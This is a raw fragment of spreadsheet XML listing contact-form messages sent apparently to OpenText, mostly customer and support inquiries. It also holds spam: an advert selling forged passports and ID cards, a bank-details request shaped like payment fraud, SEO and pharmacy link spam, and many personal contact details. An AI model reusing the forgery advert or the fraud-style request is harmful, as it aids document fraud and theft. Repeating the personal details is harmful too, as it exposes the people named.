This list Contains Company name, Web address, Contact name, Phone number, Email address, Title, physical address, City, State, Zip Code, Country, Phone number, Fax Number, Employee size._x000D_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Note: We have a discount of 20% on Thanks Giving Special_x000D_
_x000D_
Await your response…._x000D_
_x000D_
Best Regards,_x000D_
Julie Channing</t>
  </si>
  <si>
    <t>I have tried several time to complete the forms for the download. I never receive an email with a link.</t>
  </si>
  <si>
    <t>I'm looking for a quote on upgrading our Alchemy to be able to encrypt Alchemy Databases and files.</t>
  </si>
  <si>
    <t>Issue authenticating via API with OTDS 10.5 patch 3. Works ok against OTDS 10.5 patch 8_x000D_
_x000D_
Invoke-restmethod https://cs2tf1.eu.nag.net:5443/otcs/llisapi.dll/api/v1/auth -ContentType "application/x-www-form-urlencoded" -Method post -Body "username=admin;password=********"</t>
  </si>
  <si>
    <t>Partnership Request</t>
  </si>
  <si>
    <t>Contract renewal quote</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je souhaiterai connaître vos offres sur les solutions de gestion de communication client multi-canal, notamment sur l'aspect envoi d'emails (en masse ou au fils de l'eau)</t>
  </si>
  <si>
    <t>REMOVE ME from your list !!!</t>
  </si>
  <si>
    <t xml:space="preserve">Name change from Avnet to AVT Technology Solutions LLC. Our account still reads Avnet. </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, There!_x000D_
_x000D_
I hope you are doing great!!_x000D_
_x000D_
This is Sam Makad, a business consultant. I write on customer service, marketing, small business. I know you probably get a TON of emails about guest post requests. So I'll keep this really short. I think you might find it interesting..._x000D_
_x000D_
I’d be honored if I could contribute to your blog. I have made a list of topics that your readers would love to read._x000D_
_x000D_
•	8 How to manage customer team in seasonal rush_x000D_
•	Ready-To-go tips for Your online Stores in The Holiday Crunch Time_x000D_
•	Jumpstart your great holiday shopping with older customer experience_x000D_
•	5 strategies to provide better customer support in black Friday 2017_x000D_
_x000D_
If you didn’t find above topics relevant, I can brainstorm more._x000D_
_x000D_
Recently, I have published a few articles on:_x000D_
•	https://www.entrepreneur.com/article/287300_x000D_
•	https://thenextweb.com/business/2017/03/06/survive-burgeoning-market-5-perfect-strategies-follow/_x000D_
•	https://thenextscoop.com/visuals-and-visual-design-enhance-customer-service/_x000D_
•	http://www.talk-business.co.uk/2017/10/11/chatbot-implementation-a-great-idea/_x000D_
I look forward to your positive response._x000D_
</t>
  </si>
  <si>
    <t>I would like to have access to download section of EMC products. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">my email address:_x000D_
Pieter De Bie | Lead Buyer IT and Telecommunication_x000D_
Aperam Purchasing_x000D_
12C Rue Guillaume Kroll_x000D_
L-1882 Luxembourg_x000D_
T +352 273 627 182  | M +352 621 836 270    | M +32 471 79 29 87 _x000D_
pieter.debie@aperam.com | www.aperam.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>New business opportunity for Opentext and new contract directly with headquarters Europe</t>
  </si>
  <si>
    <t>I represent ECM - Documentum practice and we are planning to expand to expand our skill base to OpenText to support RFP's. There is a immediate need of OpenText Basics and Administration training for 2 resources._x000D_
Can be virtual or site based. resources are based out in Bangalore, India._x000D_
Please let me know the quotes for the same</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a Mobile solutions provider based in India. We have strong expertise on working on native and cross platform development using Telerik and Meteor framework and Node.js &amp; React. We have been developing Mobile and Web applications for our partners in the UK and European market. _x000D_
_x000D_
I want to check if we can support you in your mobile app development projects. We can have a short call as per your availability to explore more on how we can develop a mutually beneficial relationship._x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
Astrea's other Expertise include :-_x000D_
- Customer Relationship Management using Salesforce(Manage Customers, Cross Selling, Marketing Automation)_x000D_
- Customer Support solutions using Service Cloud(Call Centers, Web Chat, Live agents, Ticket Management)_x000D_
-  Business Intelligence using Klipfolio (Reports and Dashboards)_x000D_
</t>
  </si>
  <si>
    <t>Hi ,_x000D_
We are unable to find EMC documentum related softwares in our sight.We urgently need Documentum xPlore for windows._x000D_
Thanks,_x000D_
Naresh P.</t>
  </si>
  <si>
    <t>I am getting an error on login since I change my email address from hpe.com to dxc.com, can you please fix ?</t>
  </si>
  <si>
    <t>Penawaran Kerjasama industrial PC (IPC) dan industrial Networking dan solusi data akuisisi dan monitoring</t>
  </si>
  <si>
    <t>We are interested in Open Text.</t>
  </si>
  <si>
    <t>May I request that Taku Watariguchi (watariguchi-taku@ks-sol.jp) should be added as a partner to Infor, so he can access the support portal._x000D_
_x000D_
// Claes</t>
  </si>
  <si>
    <t>We have applyed our business barcode of our brand named "LUXLISS" &amp; "BEAVER", but it seems doesn't work. So we need your help to register our barcode. Could you contract me by mail to sent me the details and quotation?_x000D_
Looking forward to heard from you._x000D_
Have a nice day._x000D_
Gakki</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
Good morning!_x000D_
I just want to follow up my application yesterday for Developer/Programmer position as I was advised by Ma'am Cess to expect a phone call today._x000D_
_x000D_
Thank you for your Kindness!_x000D_
_x000D_
Regards,_x000D_
Warren Yao Sebastian</t>
  </si>
  <si>
    <t>Do you have any online/on-demand training for OpenText ProVision....?_x000D_
_x000D_
Thanks,_x000D_
Tommy.</t>
  </si>
  <si>
    <t>Cannot access OpeText/Documentum support</t>
  </si>
  <si>
    <t>Does OpenText integrate with Alexa or any other voice solution?</t>
  </si>
  <si>
    <t>hi there, could you please adivse what the fees are for one Brava Desktop Suite 7.1 R4 License and annual maintenance? Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Our team is a unique producer of quality fake documents. _x000D_
We offer only original high-quality fake passports, driver's licenses, ID cards, stamps and other products for a number of countries like: _x000D_
USA, Australia, Belgium, Brazil, Canada, Italy, Finland, France, Germany, Netherlands, Spain, United Kingdom. This list is not full. _x000D_
 _x000D_
To get the additional information and place the order just visit our website: _x000D_
 _x000D_
http://www.salepassportsfake.cc www. salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
&gt;&gt; Contact e-mails: _x000D_
 _x000D_
 _x000D_
General support: support@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
Technical support: admin@salepassportsfake.cc _x000D_
 _x000D_
 _x000D_
 _x000D_
----------------------------- _x000D_
Keywords: _x000D_
 _x000D_
buy Argentine fake passports driving licence id card for sale online _x000D_
buy Australian fake passports driving licence id card for sale online _x000D_
buy buy Austrian fake passports driving licence id card for sale online _x000D_
buy Belgian fake passports driving licence id card for sale online _x000D_
buy Brazilian fake passports driving licence id card for sale online _x000D_
buy Bulgarian fake passports driving licence id card for sale online _x000D_
buy Canadian fake passports driving licence id card for sale online _x000D_
buy Chinese fake passports driving licence id card for sale online _x000D_
buy Cuban fake passports driving licence id card for sale online _x000D_
buy Cypriot fake passports driving licence id card for sale online _x000D_
buy Czech fake passports driving licence id card for sale online _x000D_
buy Danish fake passports driving licence id card for sale online _x000D_
buy Dominican Republic fake passports driving licence id card for sale online _x000D_
buy Ecuadorian fake passports driving licence id card for sale online _x000D_
buy Estonian fake passports driving licence id card for sale online _x000D_
buy Finnish fake passports driving licence id card for sale online _x000D_
buy French fake passports driving licence id card for sale online _x000D_
buy German fake passports driving licence id card for sale online _x000D_
buy Greek fake passports driving licence id card for sale o</t>
  </si>
  <si>
    <t>ПОИСКОВОЕ ПРОДВИЖЕНИЕ. _x000D_
Комплексное интернет-продвижение сайтов без посредников и переплат в одном месте! _x000D_
Сбор различных баз для продвижения в интернете _x000D_
Эффективно и недорого. Писать в ICQ 656310373</t>
  </si>
  <si>
    <t>does the dxf viewer printer program work with windows xp and i have more questions before i buy your program....so far your program is awesome!</t>
  </si>
  <si>
    <t>I’ve been engaged by a London law firm to look at automating their accident claims process._x000D_
_x000D_
In brief, the law firm handles road traffic accident and work-based accident claims. The process is currently very manual by which claimant’s contact the law firm call centre and the call centre staff fill in a claims form on their behalf. Looking to make this process more efficient they are pushing to more of a claimant self service model where the claimant themselves can enter the content and start the claims process._x000D_
_x000D_
What we’re looking for is a forms solution that can lead the claimants through the process asking a series of questions and then at the end of the process push that data to the law firm domain over a protocol to be determined (but likely xml/json over http, ftp or queue based), satisfying additional requirements like save &amp; resume, encryption, responsive design and digital signatures. From what I've seen on the web, your solution looks like a good fit. Perhaps we could have a call to discuss further?</t>
  </si>
  <si>
    <t>I need to submit a PO for our renewal notice reference #RC259911 for contract# 0012236218. Please advise where or how to submit on this your site.</t>
  </si>
  <si>
    <t>County of Santa Clara is interested in acquiring a Data Archiving solution. I would like to explore the opportunity of arranging for a demo of the OpenText Archive Center for County stakeholders please. I can be reached at premdeep.dhanoa@isd.sccgov.org or (408) 918-7068. Thanks!</t>
  </si>
  <si>
    <t>Looking for ECM software with GIS integration. (amongst others)</t>
  </si>
  <si>
    <t>I work for City of New York, on Content Server, D2 ,  Rest applications, now I am trying to create SR, not able to see the options for this.   I have chaluvadis@finance.nyc.gov user ID for support.emc.com, login this site also, not able to see SR option for Content server,  could you please look into this and provide updates.</t>
  </si>
  <si>
    <t>Hi.  I would like to know your rates for your UPC/EAN catalog service._x000D_
_x000D_
thanks,_x000D_
JR</t>
  </si>
  <si>
    <t>Discuss ECM DMS solution</t>
  </si>
  <si>
    <t>we are training provider company looking for data management system that is suitable for training companies.</t>
  </si>
  <si>
    <t>Implementation partner inquiry</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
We are interested in your products for Major project management (for Interface management &amp; Document Exchange with contractors). As far as I know previously the product was called eRoom. Do you still providing eRoom solution or is there any other cloud solutions available which can provide us Interface management &amp; document exchange functionality?_x000D_
I would appreciate if you can get back to me as soon as possible._x000D_
_x000D_
Regards,_x000D_
Vladimir Kirkhmeyer</t>
  </si>
  <si>
    <t>Gostaria de saber sobre licenciamento da aplicação Brava DWG Viewer. Podemos utilizá-lo em um ambiente corporativo? A aplicação é Freeware?_x000D_
_x000D_
Obrigado!</t>
  </si>
  <si>
    <t>Hello there,_x000D_
_x000D_
Some time has passed since my visit to GITEX, so I am getting in touch to see if there would be any interest to discuss a possible collaboration._x000D_
_x000D_
Let me add some details about my company Prime Holding:_x000D_
_x000D_
We are a provider of premium software development services based in Europe with a leading R&amp;D division that includes more than 300 experienced developers, and a talent pool with architects, product managers, QA engineers etc._x000D_
_x000D_
We have over 17 years of experience mainly in partnerships with companies from USA and the UK and are currently expanding our network of partners._x000D_
_x000D_
I can also provide additional info upon request._x000D_
_x000D_
Feel free to contact me to discuss!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Andrey_x000D_
_x000D_
_x000D_
Andrey Genchev_x000D_
Business Development_x000D_
Prime Holding JSC_x000D_
m: +44 1 590 700 027_x000D_
e: andrey.genchev@primeholding.com_x000D_
w: www.primeholding.com</t>
  </si>
  <si>
    <t>service renewal</t>
  </si>
  <si>
    <t>We are looking to download Content Server 10 so we can perform a custom integration on behalf of one of our customers. Looking at our support account we have access to the API but not the content server application</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are in the process of selecting a solution to manage our AIX servers from Windows and would like to request a trial of OpenText Exceed. I have tried using the "request trial" form but didn't get an answer. Can you please provide us with a trial version so we can move forward with this project?_x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
David Guillaume.</t>
  </si>
  <si>
    <t>Two reasons._x000D_
1. Whenever I try to access my support, I get the screen informing that I'm almost there and I need to confirm my email. I've done this twice already. At one point I was able to get past this but I'm back to the confirmation. The time I was able to past the confirmation, I tried to put in the information that we had a service contract so I could access the knowledgebase. I entered Exceed for product line and v002415-000 for the System ID/Serial Number/PIN/VPS. I left End User number and name of co-worker blank. Now I'm back to no access request confirmation email._x000D_
_x000D_
2. The whole point to this is to see if there are any specific setting I need when connecting to a Linux server. We run full xsession and had no problems when we connect to an aix server. Now we switch to Linux and a few odd things are happening (a. hard to get focus back a Linux window at times if we had switched back to MS windows to perform tasks such as mail, b. highlight and middle mouse - copy and paste - where the paste mangles the last line if the copy range contained a blank line). We run exceed configuration basically out of the box. We use XDMCP Query with a connect host, window mode is single</t>
  </si>
  <si>
    <t xml:space="preserve">I just won a contract to help Environment Canada implement GCDocs with SharePoint integration. My area of specialization is SharePoint. I would like to request access to the My Support area at OpenText for GCDocs of GC Communities website. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam, _x000D_
_x000D_
We are wanting to pay invoice 07850581711 to you._x000D_
_x000D_
As per our security protocol , I need to get your bank account details verified. _x000D_
_x000D_
The IBAN we have for you ends in 3778._x000D_
_x000D_
I tried to contact your office on 0118 9848 000 but I reached a voicemail._x000D_
_x000D_
Please can you email your full bank account details including the bank account name to _x000D_
_x000D_
payee.details@uk.pwc.com _x000D_
_x000D_
and also copy me in the same email _x000D_
_x000D_
waqas.mohammed@uk.pwc.com _x000D_
_x000D_
Alternatively you can call me back on 0113 289 4513._x000D_
_x000D_
Thank you _x000D_
_x000D_
Kind regards _x000D_
_x000D_
_x000D_
Waqas Mohammed_x000D_
 _x000D_
PwC | Associate_x000D_
Office: 0113 289 4513_x000D_
Email: waqas.mohammed@uk.pwc.com_x000D_
PricewaterhouseCoopers LLP_x000D_
Central Square, 29 Wellington Street, Leeds LS1 4DL_x000D_
http://www.pwc.co.uk_x000D_
</t>
  </si>
  <si>
    <t>I've received the download instructions for the Brava CXL and I've received confirmation on the registration to My Support but it wont let me log on.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm Quentin Lamome and I work at Ubisoft (video game company) as an IT Buyer. We are currently trying to find a solution helping us to ease the NDA redaction/signature process. You solution looks like a good fit and we'd like you to show us (via a demo) what Envoy can do for Ubisoft._x000D_
Please contact me ASAP to organise a meeting._x000D_
_x000D_
Regards,_x000D_
Quentin Lamome</t>
  </si>
  <si>
    <t>Kasper Bramming told me that you could help me to get access to knowledge.opentext.com. We have a scanner + occ setup that has been maintained by neopost, but we want to gain knowlegde ourselves. Can you help? we should have a license</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
I am currently tasked with reviving the requirements for a DMS for the management of Capital Projects, Enterprise Content and Asset Management (Operations)._x000D_
_x000D_
I understand you have demonstrated your company’s abilities in this regards to my colleagues previously and I would like to ask if we could revisit this area as I was not involved at the time._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Brian Denehan_x000D_
Sr. Project Engineer | Projects Dept._x000D_
 _x000D_
bdenehan@crescent.ae | www.crescentpetroleum.com _x000D_
T +971 6 507 0415 | F +971 6 572 6000_x000D_
 Please consider the environment before printing this mail._x000D_
</t>
  </si>
  <si>
    <t>We are a reseller and I need access to the support site.</t>
  </si>
  <si>
    <t xml:space="preserve">I came across your website after searching for technology companies on aussieweb.com.au._x000D_
_x000D_
Basically what we do is make animated videos that are designed to promote your service online and increase your website conversion rate._x000D_
_x000D_
So I wanted to offer you a 30 second cartoon explainer video for your service for just $197. (including script/voiceover)_x000D_
_x000D_
All I ask in return is a quick testimonial if you like the video!_x000D_
_x000D_
If you are interested in this offer, you can find out more or get started at www.30secondexplainervideos.com/explainer-promo_x000D_
_x000D_
Or you can shoot me a quick email if you had any questions!_x000D_
_x000D_
Cheers, Travis Cole_x000D_
www.30secondexplainervideos.com/explainer-promo_x000D_
</t>
  </si>
  <si>
    <t>My support are not being activated - I have requested access a few times and received confirmation mails but it keeps on asking the same thing, saying opentext have not yet received the confirmation mail</t>
  </si>
  <si>
    <t>Hi, we have a German based developer (speaks both English and German) who needs to go on the 4-4202 OpenText MBPM 9.x Foundation course.  I notice in the Training catalogue that there is Virtual Classroom training in January.  However, are there any plans to do any classroom based training for this course in Europe in the next 2 or 3 months?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I have a question about the pricing. Is the pricing per user per month? Or is it a fixed price per month/year? An what are the average cost per month when you use opentext BPM?_x000D_
Best regards,_x000D_
_x000D_
William Beelen_x000D_
</t>
  </si>
  <si>
    <t>Request for contact details for Account Manager responsible for ADNOC Group Companies (oil &amp; gas) in UAE in Abu Dhabi to work on corporate agreeement</t>
  </si>
  <si>
    <t>Hello Sir / Madam,_x000D_
Good Day !!!!_x000D_
Hope you are doing well._x000D_
I am 2017 Btech pass out from ECE with an aggregate of 78.35%. I am looking for an opportunity as a fresher._x000D_
If possible please refer me to any as a fresher opportunity, it will be really helpful for me and do let me know if anything else is required._x000D_
Please find my details below. A resume is attached._x000D_
Name - Parag Kumar Jain_x000D_
Email id - paagjain164@gmaiil.com_x000D_
Mobile number - 8602448868_x000D_
Current location - Bangalore</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
This is Crystal,_x000D_
_x000D_
Would you be interested in using our permission based database which can help you to reach the following Financial Services Industry Products and Service Buyers across USA, UK, Australia and Europe:_x000D_
_x000D_
We provide Samples for Data quality check._x000D_
_x000D_
Titles:_x000D_
•	Top Management/Key decision makers_x000D_
•	Chief Executive Officers_x000D_
•	Chief Technology Officers_x000D_
•	Chief Information Officers_x000D_
•	Business Heads and Entrepreneurs_x000D_
•	Portfolio Managers/Insurance Agents_x000D_
•	Accounting Director/Manager_x000D_
•	Investors/Sub-Brokers_x000D_
•	Investment Analysts and Consultants_x000D_
•	Mutual Fund Distributors_x000D_
•	Stock &amp; Commodities Brokers_x000D_
•	Corporate Planning and IT departments_x000D_
•	Public Service Professionals_x000D_
•	Banking Industry/Market Research_x000D_
•	Management Consultants/Finance_x000D_
•	Sales and Marketing Managers_x000D_
•	Operations and Purchasing Manager_x000D_
_x000D_
Please fill in your exact Target criteria in the below mentioned format, So that I can run counts and get back to you with samples and benefits for your review._x000D_
_x000D_
Target Job title : _________  Target Industry : ______________   Target Geography :_____________ _x000D_
_x000D_
Our list includes: Name, Job title, Company Name, Permission Based E-mail address, Contact number, Physical address and many more._x000D_
_x000D_
Look forward to your response. Thank you so much for reading my email even in your busy schedule._x000D_
_x000D_
Crystal Waston_x000D_
Marketing Executive_x000D_
US Data - European Data -  Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
12840 NE 21st Place, Bellevue, WA 98005, United States_x000D_
_________________________________________x000D_
If you're not interested please reply subject line as "Leave Out”.</t>
  </si>
  <si>
    <t xml:space="preserve">The Council of Europe –EDQM is preparing for a call for tenders for the acquirement and installation of a new case management system. We are interested in your company and would like to directly send you the tender file as soon as the call for tenders is published._x000D_
In case this project is of interest to you, would you mind providing us with a contact name and email address, please?_x000D_
Thank you and kind regards,_x000D_
_x000D_
Cornelia Bigler_x000D_
</t>
  </si>
  <si>
    <t>Приветствую всех! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [b] 2017 в хорошем качестве hd лучшие комедии [/b] [url=http://kinofanonline.ru/]http://kinofanonline.ru/[/url] _x000D_
Тут: http://kinofanonline.ru/multfilmy/ [b] Лучшие мультфильмы новинки 2017 [/b] _x000D_
[url=http://kinofanonline.ru/multfilmy/] 2017 бесплатно лучшие мультфильмы [/url] _x000D_
[url=http://kinofanonline.ru/news/8749-andzhelo-badalamenti-snova-napishet-muzyku-k-serialu-tvin-piks.html] Анджело Бадаламенти снова напишет музыку к сериалу «Твин Пикс» [/url] _x000D_
http://kinofanonline.ru/drama/5303-gogol-blizhayshiy-2009.html [b] Смотреть Гоголь. Ближайший (2009) онлайн бесплатно [/b] _x000D_
http://kinofanonline.ru/news/4606-mark-frost-napisal-knigu-o-tvin-pikse.html</t>
  </si>
  <si>
    <t>Dear Madaam/Sir,_x000D_
_x000D_
I would like to buy Brava Reader for my company, and also I need invoice document., please let me know that how do I do for purchasing process? _x000D_
_x000D_
Best Regards,_x000D_
Manode Kareesoor</t>
  </si>
  <si>
    <t>Каркасная конструкция имеет негативное свойство выводить тепло накопившееся внутри помещения на улицу. Чтоб избежать подобных теплопотерь, или значительно уменьшить их показатели, рекомендуется подобрать подходящий утеплитель для каркасного дома, подробнее читайте на сайте [url=http://omontazhe.ru]omontazhe.ru[/url]</t>
  </si>
  <si>
    <t>Модные женские советы здесь [url=http://zdorovaya-life.ru/]zdorovaya-life.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> How to unclog PaintSlrayCanns- both types -  Your browser indicates if you've visited this link How to unclog PaintSprayCans- both types. Well first, if you shake thespraypaint can thoroughly for at least 5 minutes, you likely will have no ...  /watch?v=MqwSg9sZZOI More results.&lt;br&gt; If it doesn't discourage then at least it saves your bed linen and mattress from dogurine .  of dogurineon a mattress   to RemoveCatUrineOdor from Laundry - The Spruce Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
 [url=http://tussati-walf.soup.io/]Bengal house cat rescue[/url] [url=http://879ulbomernekf.soup.io/]Rabid cat behavior[/url]  _x000D_
 Read these simple tips on how toremovepet stains andurineodor fromcarpet .  petyurineodor fromcarpet .  rid ofurineodor is   Your browser indicates if you've visited this link&lt;/u&gt;.&lt;br&gt; 21 Aug 2009 ... I have to spray the bottom of the top seat with clorox bldach after every time I pee because my urine was beginning to stain it. Will  stream splits into two streams - Urology - MedHelp&lt;/strong&gt;.&lt;br&gt;  _x000D_
sssscat australia _x000D_
 _x000D_
 Signs&amp; Symptoms of KidneyInfectioninCats- Pets Your browser indicares jf you've visited this link Kidney disease is fairly common incats , especially as they age. If you start noticingsignsand symptoms of kidneyinfection , take Ktty to the vet right away. The ...   More results.&lt;br&gt; Feline rabies is a disease of the central nervous  develops in three stages: prodromal, furious and paralytic. The virus is transmitted by bites  inCats- Symptoms, Causes, Diagnosis, Treatment ... Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
  [url=http://tussati-walf.soup.io/]Bengal house cat rescue[/url] [url=http://02phylpalcuwa9x.soup.io/]Toys cats like[/url]  _x000D_
 HowtoRemove UrineSfainsand Odors from aMattress Your browesr indicates if you've visited this link Ifmattressstainsand odors are taking over yourmattressthis simple method will quickly become your best friend. Check out the reader tips - esp. #4!  /cle</t>
  </si>
  <si>
    <t>Interesse an Opentext Cloud</t>
  </si>
  <si>
    <t>Dears,_x000D_
i need a technical and financial offer for digital forensic hardware.</t>
  </si>
  <si>
    <t>Our smm studio is engaged in the promotion and creation of portals for massage room in the city Detroit for your business on a turn-key basis. _x000D_
 _x000D_
Create the right internet project, which will not only look unusual, but also help attract more regular customers. _x000D_
 _x000D_
With production website spa salon we will find for you decisive solution, we will make an attractive modern design Considered easy to navigate through Internet service. We have been creating for many years websites, and excellent know what exactly is required to create a quality Internet project massage salon. _x000D_
 _x000D_
We carefully think through every online service. The specialists of the web studio study the leading websites on the market for erotic salon, programmers introduce new technologies, SEO specialists think out how to do it to portal liked the search engines. We will find an effective solution for presenting information about you. Attractive design, convenient structure, interactive services will allocate you among other sites online services massage parlors. _x000D_
 _x000D_
You can choose the design of service from the proposed basic designs. When ordering website in the proposed basic designs are made changes: added your logo, slogan, title website. In addition, the main image can be changed to another one, suitable for the topic. _x000D_
 _x000D_
WEBSITE MARKETING COMPANIES : [url=https://creation-of-sites-for-massage.pro/]promotion facebook group for salon[/url]</t>
  </si>
  <si>
    <t>Привет всем! класный у вас сайт! _x000D_
Нашел интересную базу кино: [b] Лучшая фантастика список 2017 [/b] [url=http://kinofly.net/]http://kinofly.net/[/url] _x000D_
Тут: http://kinofly.net/detektiv/654-monstr-monster-2003.html [b] Смотреть Монстр / Monster (2003) онлайн бесплатно [/b] _x000D_
Тут: [url=http://kinofly.net/news/10808-zhiteli-nyu-yorka-ne-priznali-v-genri-kaville-supermena.html] Жители Нью-Йорка не признали в Генри Кавилле Супермена [/url] _x000D_
Тут: http://kinofly.net/poznavatelnoe/9670-apokalipsis-vtoraya-mirovaya-voyna-gitler-apocalypse-la-2eme-guerre-mondiale-apocalypse-hitler-apocalypse-the-second-world-war-apocalypse-hitler-sezon-1-2009.html _x000D_
Здесь: http://kinofly.net/fantastika/ [b] Лучшие фантастика 2017 смотреть [/b] _x000D_
Тут: http://kinofly.net/fantastika/ [b] Новинки смотреть онлайн лучшая фантастика [/b] _x000D_
Здесь: [url=http://kinofly.net/triller/] 2017 смотреть лучшие триллеры [/url]</t>
  </si>
  <si>
    <t>微信噢耶哦哦咯楼我了</t>
  </si>
  <si>
    <t xml:space="preserve">Crizalk 250mg - Кризотиниб 250мг. Cтоимость, цена, купить, отзывы, отзывы пациентов _x000D_
 _x000D_
[url=http://india-med.net/anticancer]Эрвиназа - Erwinase 10000E Cтоимость, цена, купить, отзывы, отзывы пациентов[/url]_x000D_
 _x000D_
[url=http://india-med.net/lucius-pharmaceuticals-onko]Купить, стоимость, цена, отзывы пациентов[/url]_x000D_
 _x000D_
&lt;a href=http://india-med.net&gt;софосбувир инструкция&lt;/a&gt;_x000D_
 _x000D_
[url=http://india-med.net]софосбувир и даклатасвир цена 2016[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking for pricing on fax express server software ( on prem ).</t>
  </si>
  <si>
    <t>Sold an item on ebay for $150 and funds went to this email lancleaningservice91331@gmail.com funds went to this unknown account. Funds should go to this paypal account imflip13@yahoo.com can you help me transfer my MONEY to my paypal account email which is imflip13@yahoo.con</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;h2&gt;Urine Marking in Cts  ASPCA&lt;/h2&gt;.&lt;br&gt; Urine spraiyng incats InternationalCatCare Your browser indicates if you've visited this link Urine spraying is a form of territorial marking behaviour. Find out what to do if yourcatstarts spraying indoors.  /azdvice/problem-behaviour/urine-spraying-cats More results.&lt;br&gt;  _x000D_
 [url=http://12scurinti-yoi3.soup.io/]How to get pet smell out of carpet[/url] [url=http://forbella-gonj.soup.io/]Pet obedience school[/url]  _x000D_
 &lt;i&gt;PDFDr. aurie Marker - Cheetah Conservation Fund March 2015 ... Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; &lt;h3&gt;HomemaadeCatUrineCleanerRecipes  ThriftyFun Your browser indicates if you've visited this link&lt;/h3&gt;.&lt;br&gt;  _x000D_
teaching cat use toilet _x000D_
 _x000D_
 TheFlyingCatToyMug   Your browser indicates it you've vixited this link Shop TheFlyingCtToyMug created by twopurringcast. Personalize it with photos &amp; text or purchase as is!  /the_flying_catt_oy_mug-168289591513551109 More results.&lt;br&gt; &lt;h3&gt;RemovingCatUrineOdor with Homemade Cleaners-Pet Stains Your browser indicates if you've visited thjs link&lt;/h3&gt;.&lt;br&gt;  _x000D_
  [url=http://9quosecnagohr.soup.io/]Catching stray cats[/url] [url=http://7prosvima-hobn.soup.io/]Marine spray paint[/url]  _x000D_
 Blood in urine - known medically as hematuria - is usuallyg not a reason for major alarm. Because blood in urine can be a sign of a serious medical condition, however  Causes ofBlood in Urine in  Diagnostic Cyber Article on microscopic hematuria (blood in the urine): causes, effects and  is the Significance ofMicroscopic Hematuria ?&lt;/i&gt;.&lt;br&gt; &lt;strong&gt;Keeping Kittens In A Cage- Image Results&lt;/strong&gt;.&lt;br&gt;  _x000D_
how to make cat litter smell less _x000D_
 _x000D_
CevaFeliwayDiffuserModern life does not always make for happy cats - strses can contribufe directly to heatlh problems. Plug in the Feliwaydiffuserand the Sprays -  Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; Only think that finally worked for me was Kilz all over the walls and ... Back then there wasn't w Cloro</t>
  </si>
  <si>
    <t>Практически все замужние женщины имеют тайное желание – проверить своего мужчину на верность. Ревность – та черта, которая всегда имеет место в отношениях между супругами. Очень часто она возникает на определённой почве. Подробнее читайте на сайте [url=http://s-narodom.ru]s-narodom.ru[/url]</t>
  </si>
  <si>
    <t>Люди всегда были склонны к тому, чтобы фантазировать и придумывать что-то просто невообразимое. Это связано с тем, что повседневная наша жизнь иногда может быть довольно скучной и неинтересной, полной рутинных дел и забот, подробнее об этом читайте на сайте [url=http://hayastannews.com]hayastannews.com[/url]</t>
  </si>
  <si>
    <t xml:space="preserve"> 1-800-499-6544</t>
  </si>
  <si>
    <t>Need job</t>
  </si>
  <si>
    <t>Данные вредные привычки увеличивают возраст мозга на несколько лет. Из-за этого, в свою очередь, страдают память и способность к обучению. К такому выводу пришли сотрудники Университета Турку, подробнее читайте на сайте [url=http://womaan.ru]womaan.ru[/url]</t>
  </si>
  <si>
    <t>Interested in potentially partnering - looking to chat with Partnership/Alliances contact.</t>
  </si>
  <si>
    <t>I been trying for several weeks to reinstall the program in other computer. Its have been simply imposible with the mailing support. Please call me as soon as posible.</t>
  </si>
  <si>
    <t xml:space="preserve">We just recently purchased the Brava Reader TX for viewing our Water and Sewer plans and we have been having an issue ever since we loaded it. The Free Brava Reader was better than the one we are paying for. Could you please help us. We get a Network license communication error._x000D_
Personall loading the free version every 6 months or so is better than getting the complaining phones calles every few days._x000D_
_x000D_
Thank you_x000D_
Theresa_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My name is A.D. Berry and here at Altus Global we’ve assisted William Thomas &amp; Jessica Jow at Actuate in the past collecting delinquent commercial accounts (#459815 Montclair/Netik Inc, #487788 Media Ocean) under our Coface Collections brand.  We’ve rebranded and are reaching out to our former potential clients and I was told you are the person of contact for this matter.  If you’re like the other former clients I’ve spoken to recently, you probably have a couple of accounts that you are not yet ready to place for collections. Our Business Scan and our Aging Analysis are FREE Services that provide you with information on the financial stability and history with other creditors for your company’s delinquent receivables. With this information you will have everything you need to make the best decision regarding these accounts._x000D_
_x000D_
Please give me a call as soon as possible so that you can be better informed on the companies that have not responded to your repeated requests for payment.  There is no obligation to place accounts for collection but it will provide you with some answers that might be on your mind concerning your accounts receivables._x000D_
</t>
  </si>
  <si>
    <t>We sent a payment to Easylink Services and it was returned as undeliverable; the address we have on file is PO Box 791247 Baltimore MD  21279 - has this office relocated?  If so please provide current address.</t>
  </si>
  <si>
    <t>Would like to explore SAP AP Invoices automation</t>
  </si>
  <si>
